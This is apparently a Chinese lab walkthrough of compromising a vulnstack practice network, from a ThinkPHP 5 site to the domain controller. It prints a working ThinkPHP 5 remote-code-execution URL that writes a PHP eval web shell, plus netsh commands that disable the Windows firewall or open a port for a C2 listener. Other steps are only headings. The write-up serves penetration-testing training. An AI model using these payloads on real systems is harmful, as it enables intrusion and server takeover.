靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网)
win2008:192.168.138.138
访问80看看,是TP5的站
关于tp5的漏洞利用方式请查看:https://www.cnblogs.com/backlion/p/10106676.html
成功利用,并执行了命令
写入shell
http://192.168.1.18/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["code"]);?^>>shell.php
上线C2
内网存活主机探测
查看域控
现在已经是管理员权限了可以直接抓下密码看看
上链路进行横向
生成载荷上传到目标机器
批量上线DC不成功
NetSh Advfirewall set allprofiles state off
,或者添加规则来放行5555端口netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=5555
最后全部上线
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。